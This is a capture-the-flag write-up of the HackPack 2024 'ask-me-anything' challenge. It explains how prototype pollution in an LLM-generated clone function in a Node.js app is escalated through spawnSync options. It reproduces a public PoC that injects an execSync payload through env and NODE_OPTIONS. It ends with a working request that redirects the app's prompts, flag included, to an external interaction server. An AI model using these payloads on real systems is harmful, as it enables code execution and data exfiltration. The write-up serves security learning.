HackPack CTF 2024 LLM Edition - ask-me-anything
ask-me-a-question
This challenge was a WEB 450 points challenge of the HackPack 2024 CTF. The focus of this CTF was on exploiting LLM applications. However, this app could fit into most CTF formats, as the exploit iteslf does not correctly correlate with LLMs.
In my personal opinion the challenge is well done. The vulnerability is anchored in a real-world scenario with much research backing it up. The final payload is quite close to publicly available, copy-pastable, payloads. However, the CTF player still needs to understand the vulnerability in its core and make minor adjustments to get it to work.
Vulnerability Overview
The basics
The challenge environment contains two parts. A Python FastAPI
webserver, and a node.js
server on which we will focus on.
The web interface of the challenge provides us with very limited functionality. Overall, there is only one endpoint /ask
, which allows us to send prompts to the application.
A typical prompt looks like the following:
Request
POST /ask HTTP/1.1
Host: localhost:1338
Content-Length: 51
Api-UserAgent: frontend/0.1alpha
sec-ch-ua: "Chromium";v="123", "Not:A-Brand";v="8"
Content-Type: application/json
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Origin: http://localhost:1338
Referer: http://localhost:1338/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
{"prompt":{"role":"user","content":"What is HTML"}}
Response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Sat, 13 Apr 2024 14:01:09 GMT
Content-Length: 1230
{"status":200,"message":"?\nAI: HTML is a markup language used to create content for the web. It stands for HyperText Markup Language.\nHuman: <snipped> each of these elements on the page.\nHuman: Wow, I had no idea! Can you teach me more about"}
The sink
Our goal is to get the flag. The flag hides within the defaultPrompt
const
which retrieves the flag from an environment variable. In order to get the flag we need to either:
- Get access to the prmopts as they are sent to the LLM server (the app always sents all prompts to the server, but filters out the flag prompt)
- An LLM answer which reflects the system question (which contains the flag), or reflects the flag in its’ answer
- We need to be able to retrieve the flag from the node.js environment
const defaultPrompt = [
{"role": "system", "content": `Blah Blah Blah '${process.env['FLAG']}'. Blah Blah Blah. You are a chatbot named Aanya.`},
{"role": "user", "content": "Introduce yourself"},
{"role": "assistant", "content":"I'm Aanya, and I am a online chatbot."},
];
The most promising sink is in the llm.js
file, which sends all prompts to an URL which is retrieved from an environment variable of the process.
const LLM_URL = process.env['LLM_URL']
const resp = await fetch(LLM_URL, {
method: 'POST',
body: JSON.stringify({
'messages': prompts
}),
headers: {
"Content-Type": "application/json",
}
});
It must be noted that the llm.js
file is executed by the node.js app server. As can be seen in the following code snippet, the server executes a synchronus process (with spawnSync
) with the following cmd line: node "llm.js" "system prompt with <flag>" "the other prompts"
.
function createArguments(fullPrompt) {
let list = ['./llm.js', ];
for(let i = 0; fullPrompt[i]; i++) {
list.push(fullPrompt[i].role);
list.push(fullPrompt[i].content);
}
return list;
}
const child = spawnSync('node', createArguments(allPrompt), { encoding: 'utf-8', stdio: 'pipe' });
Exploitation
We are very limited in what we can submit to the challenge. There are multiple “prompt injection” sanitation routines. The following code snippet highlightes one routine. As can be seen, our “prompt request” can only contain the attribute role: user
plus some other input validation.
function checkPromptInjection(prompt) {
if ( typeof prompt !== 'object' ) {
throw Error('Incorrect format specified');
}
if ( prompt.role !== 'user' ) {
throw Error('Incorrect user specified');
}
if ( !/^[a-zA-Z0-9 ]+$/.test(prompt.content) ) {
throw Error('Prompt injection detected');
}
if ( prompt.content.length > 40 ) {
throw Error('Prompt is greater than 40 characters.')
}
if ( !allowedPrompts.includes(prompt.content) ) {
throw Error('Prompt injection detected')
}
const safePromptData = clone({}, prompt, 5);
return safePromptData;
}
The previous sanitation routine also contains a potential indicator for a JavaScript Prototype Polution vulnerability. Namely the following line:
const safePromptData = clone({}, prompt, 5);
If we investigate the clone
function, we find that
- it was created by a developer using a LLM prompt
- the function recursively clones a JavaSript object As this
clone
function is called on a attacker-controlledprompt
object, we are able to manipulate the prototype of the app server and inject attacker-controlled properties into the environment.
Prototype pollution vulnerabilities typically arise when a JavaScript function recursively merges an object containing user-controllable properties into an existing object https://portswigger.net/web-security/prototype-pollution
/*
Prompt:
Generate a JS Function that clones a javascript object,
make sure to handle nested objects and nested array properly.
Output (starts here):
This function 'clone' creates a deep copy of a given object.
It recursively iterates through the properties of the object,
copying each property into a new object. If a property is an object itself,
it recursively clones that object. If a property is an array, it creates
a shallow copy of the array. Finally, it returns the cloned object.
*/
function clone(target, obj, depth) {
if ( depth === 0 ) {
return {};
}
// Iterate through each key in the original object
for (const key in obj) {
// Convert string key to integer if it's numeric
const numericKey = /^\d+$/.test(key) ? parseInt(key) : key;
// Check if the value associated with the key is an object
if (typeof obj[numericKey] === 'object') {
if ( !target[numericKey] ) {
target[numericKey] = {};
}
// If the value is an object, recursively clone it
target[numericKey] = clone(target[numericKey], obj[numericKey], depth - 1);
} else if (Array.isArray(obj[numericKey])) {
// If the value is an array, create a copy of the array
target[numericKey] = obj[numericKey].slice();
} else {
// Otherwise, directly assign the value to the cloned object
target[numericKey] = obj[numericKey];
}
}
// Return the cloned object
return target;
}
In practice, injecting a property called evilProperty is unlikely to have any effect. However, an attacker can use the same technique to pollute the prototype with properties that are used by the application, or any imported libraries. https://portswigger.net/web-security/prototype-pollution
First we test our thesis if prototype polution is possible. We inject a quick-and-dirty console.log(ppp)
. The property ppp
does not exist and we get an error:
const safePrompt = checkPromptInjection(prompt);
console.log("000:"+ ppp +"000end");
let allPrompt = [];
Then we inject the property through prototype polution and check if everything is working correctly. As we can see, we successfully injected the property ppp
into the node.js __proto__
.
To exploit the prototype polution we need to find a property which we can manipulate, is not overwritten, and manipulating it has a security-relevant side-effect.
A popular prototype exploitation sink are calls to spawnSync
. The library takes certain manipulatable properties which, when not specificaly set by a developer, are controllable by the attacker.
// Prototype polution due to `clone` function
const safePrompt = checkPromptInjection(prompt);
let allPrompt = [];
for(let i = 0; i < defaultPrompt.length; i++) {
// Prototype polution due to `clone` function
allPrompt.push(clone({}, defaultPrompt[i], 5));
}
// pusing the following arguments on a list `llm.js` `system prompt` `assistant prompt` `user prompt`
allPrompt.push(safePrompt);
// Spawning the `llm.js` script with the command
// `node "llm.js" "system prompt" "assistant prompt"` ...
const child = spawnSync('node', createArguments(allPrompt), { encoding: 'utf-8', stdio: 'pipe' });
As seen in the following public PoC, the PoC makes use of several properties which an attacker can control. While this PoC is a good indication on how to exploit our CTF challenge, it does not run out of the box.
p.__proto__.argv0 = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.shell = "/proc/self/exe" //You need to make sure the node executable is executed
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
p.__proto__.NODE_OPTIONS = "--require /proc/self/environ"
var proc = spawnSync('something');
We can try to inject some properties from the PoC and observe different error messages (please note that we needed to insert some custom console.log
statements for the errors).
- If we inject a
"shell":"/proc/self/exe"
property, we retrieve an error as the shell wants to call thellm.js
, but without thenode
command.
- If we inject a non-existant
shell
, we see how the process is spawned. Please note that the prompt containing the “flag” is passed as argument.
The PoC available on HackTricks expects that the victim calls spawnSync
without any arguments. Therefore we need to adjust the PoC.
- PoC expectation:
spawnSync('node');
- Our CTF call:
spawnSync('node', arguments);
Within the LLM.js file we notice that the fetch
call uses the variable LLM_URL
to determine where to send our prompts to. Normally the LLM_URL
would point to our python server which hosts our langchain HUGGINGFACE
API.
However, if we have a look at the top of the file, we noticed that the scripts retrieves the LLM_URL
from the process environment.
// LLM.js
const LLM_URL = process.env['LLM_URL']
const prompts = [];
[...]
const resp = await fetch(LLM_URL, {
method: 'POST',
body: JSON.stringify({
'messages': prompts
}),
headers: {
"Content-Type": "application/json",
}
});
Knowing that the LLM_URL
is controlled by the process environment is great news. If we check the previous HackTricks PoC, we notice that it also utilises the env
to exploit spawnSync
.
p.__proto__.env = { "EVIL":"console.log(require('child_process').execSync('touch /tmp/spawnSync-environ').toString())//"}
If we have a look at the spawnSync
call, we can also see that no explicity env
is passed by the developer to the process. Lets attempt to overwrite the env
of the LLM.js process and control the LLM_URL
url.
For a successful exploit we first set the env
property to make sure it is empty. Afterwards we set the LLM_URL
property with an attacker-controlled URL.
When we spawn the process the LLM_URL
will already be set to our attacker-controlled webserver. The llm.js
script will attempt to overwrite the LLM_URL
by retrieving it from the process environment. However, as the environment is empty, this fails.
In result, the fetch
call in the llm.js
will send all prompts, including the system prompt with the flag, to our attacker-controlled interact.sh server.
POST /ask HTTP/1.1
Host: localhost:1338
Content-Length: 159
Api-UserAgent: frontend/0.1alpha
sec-ch-ua: "Chromium";v="123", "Not:A-Brand";v="8"
Content-Type: application/json
Connection: close
{"prompt":{"role":"user","content":"What is HTML",
"__proto__":{"ppp":"testppp","env":{},
"LLM_URL":"http://codpf2tu49utntqv3a6g4noqs6o3y6ijf.oast.pro/"}
}}
The request body contains our flag and we successfully solved the CTF. Sadly, as you might have noticed in the timestamp, we solved the challenge 6 minutes too late and did not recieve any points…